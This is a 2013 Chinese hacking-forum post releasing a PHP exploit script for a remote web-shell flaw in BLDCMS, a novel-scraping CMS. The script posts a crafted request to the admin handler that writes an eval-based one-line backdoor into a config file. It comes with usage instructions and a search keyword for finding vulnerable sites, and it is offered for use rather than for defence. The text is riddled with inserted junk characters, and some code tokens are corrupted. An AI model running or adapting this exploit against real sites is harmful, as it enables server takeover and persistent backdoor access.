之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞# M) W8 t- v ]0 _5 g" V! n
+ {- \1 L: [. w
; S& X% N/ z" m2 ~* C. m话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 & k6 g. r: i2 v" Q) {( Z
3 r$ |5 G7 _* V2 b既然都有人发了 我就把我之前写好的EXP放出来吧; O' W5 C3 |$ q' }8 F: O
9 |8 i5 X" K& f3 ^9 x# q! X0 y
view source print?01.php;">
. P; H" ^2 f' f- Z" x( A; R# M+ m02.<!--?php, H- f3 F# X5 \* s! q y, D% _
03.echo "-------------------------------------------------------------------
, K8 L7 ^9 ]9 k8 D04.
4 O! W/ j4 x" u9 m' a. i6 D7 A05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP* {8 k3 i, v$ o8 z, R8 \
06.
. V$ m. R% x2 D# f( R: o) Q07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun% F' p0 P7 J6 e; h) `0 W' K
08. 1 W; |/ A) v. w' B- B; }
09.QQ:981009941\r\n 2013.3.21\r\n
% U5 y# W7 w* E. o/ ~! B10. 0 T. d3 W0 ~0 d: S( v0 x9 e0 L- p
11.
8 s& m4 S! M1 [8 @. P( V) z9 E12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码7 G$ x3 V" m) i6 X
13.
+ c3 v$ _2 s, N14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
8 V2 s" Q: `+ G0 T15.
9 \: x: i$ z& Y8 G( c) V16.--------------------------------------------------------------------\r\n"; b: N" a3 P5 Z
17.$url=$argv[1];
0 q5 s& w6 T9 |& K+ o# ?1 h4 {18.$dir=$argv[2];
0 Z t% Z: c1 U- m: r1 E/ f19.$pass=$argv[3];
1 A% M& J" u6 | }+ [3 V20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
X: G. }4 N4 b& X q21.if (emptyempty($pass)||emptyempty($url))
! @/ [ k8 m8 l. g22.{exit("请输入参数");}
6 ^. y' ^2 [$ d. T! \3 H23.else' A# f& g4 X8 ^; W7 Z- A
24.{6 T& j; Q. Y( }3 L- E
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev3 i9 o2 w3 x9 w8 g7 O% N* }
26. # _& o+ O7 ]1 d. w7 P" t H5 ^/ |0 Z
27.al;1 o. X1 t& J0 _% M4 E
28.$length = strlen($fuckdata);
. M; c7 |% w2 f+ l) U0 Q- E29.function getshell($url,$pass)
" O% i9 E0 s% I. k30.{1 y) N. a, A3 `: }3 |/ I
31.global $url,$dir,$pass,$eval,$length,$fuckdata;0 {6 C& D `$ |/ B5 h
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";6 ^. s0 j! w* `; N! G6 G! d, G: q
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
- H/ c4 W0 ]# h7 g/ A34.$header .= "User-Agent: MSIE\r\n";/ \. n" T. I5 b1 H& ~+ J* W }* g
35.$header .= "Host:".$url."\r\n";
- N, v& j M) i! u# H* w36.$header .= "Content-Length: ".$length."\r\n";
- Z7 b* s* ]0 o7 `9 U37.$header .= "Connection: Close\r\n";, O4 f- r: x( Z7 ^: _
38.$header .="\r\n";3 ^( F6 u! R2 v; E
39.$header .= $fuckdata."\r\n\r\n";
" }, K' X* t- y4 N5 R" K4 n40.$fp = fsockopen($url, 80,$errno,$errstr,15);
' O1 L5 G& c/ Z41.if (!$fp)" p7 P( B+ {: H5 C8 Y
42.{0 V5 Q$ L# ~5 Z1 R. ] v; ^7 X" I
43.exit ("利用失败:请检查指定目标是否能正常打开");' ?# {9 T% ]( i' K, N
44.}
. j" f+ H$ c! @5 p% f6 |- K45.else{ if (!fputs($fp,$header))
# I7 k0 Z( f- ~+ [ k: }46.{exit ("利用失败");}2 b1 f; ^4 a0 n w9 W; A% d
47.else
, g! @+ Y3 u# u; j% Z48.{+ i% l2 s& p0 f
49.$receive = '';
9 k+ E0 |+ S' \6 M50.while (!feof($fp)) {
. |( H1 p* F+ j Z51.$receive .= @fgets($fp, 1000);
; C( x* x, z( y7 s; c* m52.}
$ U2 B6 i! Q; I. Y/ M53.@fclose($fp);
- J0 O0 r) _! b A2 h" a54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标" f% X9 W+ `, j) R& S6 s
55. 9 q+ l( X/ M6 _ t0 e0 I! s
56.GPC是否=off)";. b1 e2 `3 o( r2 m# r& I* K5 N
57.}}, [- m I* q9 ?0 {/ r2 U( Q
58.}( E! e) U, F7 B& m) [1 k
59.}" c& u# z3 U4 e. l3 ^0 n* y5 o
60.getshell($url,$pass);' K/ m8 `% ~2 z- p- ~
61.?-->- |; {6 |5 D1 c* B* b+ I
% m! {5 G9 R% f# X! k) v' c
4 G4 V! d T0 i; X9 o+ z
# `8 q- {3 I7 X3 Wby 数据流. L7 j$ g$ s" ^8 i9 w: a. b
|
发表于 2013-3-26 20:49:10
收藏
支持
反对